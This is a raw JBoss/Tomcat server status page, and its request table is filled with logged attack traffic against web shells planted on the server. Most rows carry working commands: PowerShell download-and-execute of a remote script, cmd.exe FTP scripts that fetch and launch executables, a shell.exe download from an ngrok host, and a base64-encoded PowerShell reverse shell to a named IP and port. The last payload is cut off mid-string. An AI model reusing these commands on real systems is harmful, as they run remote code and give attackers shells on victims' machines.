JVM

Free memory: 140.51 MB Total memory: 220.75 MB Max memory: 493.06 MB

ajp-0.0.0.0-8009

Max threads: 40 Current thread count: 0 Current thread busy: 0
Max processing time: 0 ms Processing time: 0.0 s Request count: 0 Error count: 0 Bytes received: 0.00 MB Bytes sent: 0.00 MB

StageTimeB SentB RecvClientVHostRequest

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive

http-0.0.0.0-8080

Max threads: 250 Current thread count: 80 Current thread busy: 42
Max processing time: 4833814 ms Processing time: 181615.2 s Request count: 405259 Error count: 40484 Bytes received: 22.62 MB Bytes sent: 6101.42 MB

StageTimeB SentB RecvClientVHostRequest
S3862492448 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S3654620856 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S3653049304 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekiolsu.txt%26%40echo+binary%3E%3Ekiolsu.txt%26%40echo+get+%2Fwinscp1.exe+C%3A%5CWindows%5CTemp%5Cwinscp1.exe%3E%3Ekiolsu.txt%26%40echo+quit%3E%3Ekiolsu.txt%26%40ftp+-s%3Akiolsu.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cwinscp1.exe HTTP/1.1
S3665841301 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S3653615004 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S3842337259 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S3862027838 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S2419281753 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1
S3653546739 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S3841878387 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S3807081575 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S3842616363 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S3652852388 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekiolsu.txt%26%40echo+binary%3E%3Ekiolsu.txt%26%40echo+get+%2Fwinscp1.exe+C%3A%5CWindows%5CTemp%5Cwinscp1.exe%3E%3Ekiolsu.txt%26%40echo+quit%3E%3Ekiolsu.txt%26%40ftp+-s%3Akiolsu.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cwinscp1.exe HTTP/1.1
S3653714247 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
S3185558359 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1
S3654277633 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1
R??????
S96708252 ms0 KB0 KB104.200.67.381.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
R??????
S3579967673 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekiolsu.txt%26%40echo+binary%3E%3Ekiolsu.txt%26%40echo+get+%2Fwinscp1.exe+C%3A%5CWindows%5CTemp%5Cwinscp1.exe%3E%3Ekiolsu.txt%26%40echo+quit%3E%3Ekiolsu.txt%26%40ftp+-s%3Akiolsu.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cwinscp1.exe HTTP/1.1
R??????
S2832653293 ms0 KB0 KB138.121.172.62catalogo.museolazarogaldiano.esGET //jexws4/jexws4.jsp?ppp=powershell+iex+%22%28New-Object+System.Net.WebClient%29.DownloadFile%28%27https%3A%2F%2F49f1-138-121-172-62.ngrok.io%2Fshell.exe%27%2C%27shell.exe%27%29%22 HTTP/1.1
S3579583627 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekiolsu.txt%26%40echo+binary%3E%3Ekiolsu.txt%26%40echo+get+%2Fwinscp1.exe+C%3A%5CWindows%5CTemp%5Cwinscp1.exe%3E%3Ekiolsu.txt%26%40echo+quit%3E%3Ekiolsu.txt%26%40ftp+-s%3Akiolsu.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cwinscp1.exe HTTP/1.1
S3268989740 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekisols.txt%26%40echo+binary%3E%3Ekisols.txt%26%40echo+get+%2Fopenvpn.exe+C%3A%5CWindows%5CTemp%5Copenvpn.exe%3E%3Ekisols.txt%26%40echo+quit%3E%3Ekisols.txt%26%40ftp+-s%3Akisols.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Copenvpn.exe HTTP/1.1
S1509802921 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1
S2832647066 ms0 KB0 KB138.121.172.62catalogo.museolazarogaldiano.esGET //jexws4/jexws4.jsp?ppp=powershell+iex+%22%28New-Object+System.Net.WebClient%29.DownloadFile%28%27https%3A%2F%2F49f1-138-121-172-62.ngrok.io%2Fshell.exe%27%2C%27shell.exe%27%29%22 HTTP/1.1
R??????
S33411998 ms0 KB0 KB104.200.67.381.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
R??????
R??????
R??????
R??????
S3226698458 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekisols.txt%26%40echo+binary%3E%3Ekisols.txt%26%40echo+get+%2Fopenvpn.exe+C%3A%5CWindows%5CTemp%5Copenvpn.exe%3E%3Ekisols.txt%26%40echo+quit%3E%3Ekisols.txt%26%40ftp+-s%3Akisols.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Copenvpn.exe HTTP/1.1
S126 ms8 KB0 KB34.236.192.4catalogo.museolazarogaldiano.esGET /status HTTP/1.1
R??????
S2832659525 ms0 KB0 KB138.121.172.62catalogo.museolazarogaldiano.esGET //jexws4/jexws4.jsp?ppp=powershell+iex+%22%28New-Object+System.Net.WebClient%29.DownloadFile%28%27https%3A%2F%2F49f1-138-121-172-62.ngrok.io%2Fshell.exe%27%2C%27shell.exe%27%29%22 HTTP/1.1
S3184969682 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1
R??????
R??????
R??????
S3271223108 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekisols.txt%26%40echo+binary%3E%3Ekisols.txt%26%40echo+get+%2Fopenvpn.exe+C%3A%5CWindows%5CTemp%5Copenvpn.exe%3E%3Ekisols.txt%26%40echo+quit%3E%3Ekisols.txt%26%40ftp+-s%3Akisols.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Copenvpn.exe HTTP/1.1
R??????
S1500090105 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1
S33405812 ms0 KB0 KB104.200.67.381.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
R??????
S94449941 ms0 KB0 KB104.200.67.381.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
S2832666090 ms0 KB0 KB138.121.172.62catalogo.museolazarogaldiano.esGET //jexws4/jexws4.jsp?ppp=powershell+iex+%22%28New-Object+System.Net.WebClient%29.DownloadFile%28%27https%3A%2F%2F49f1-138-121-172-62.ngrok.io%2Fshell.exe%27%2C%27shell.exe%27%29%22 HTTP/1.1
S91925945 ms0 KB0 KB104.200.67.381.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
R??????
S2418584199 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1
S24434831 ms0 KB0 KB104.200.67.381.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
S3226918269 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekisols.txt%26%40echo+binary%3E%3Ekisols.txt%26%40echo+get+%2Fopenvpn.exe+C%3A%5CWindows%5CTemp%5Copenvpn.exe%3E%3Ekisols.txt%26%40echo+quit%3E%3Ekisols.txt%26%40ftp+-s%3Akisols.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Copenvpn.exe HTTP/1.1
R??????
R??????
S91919766 ms0 KB0 KB104.200.67.381.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG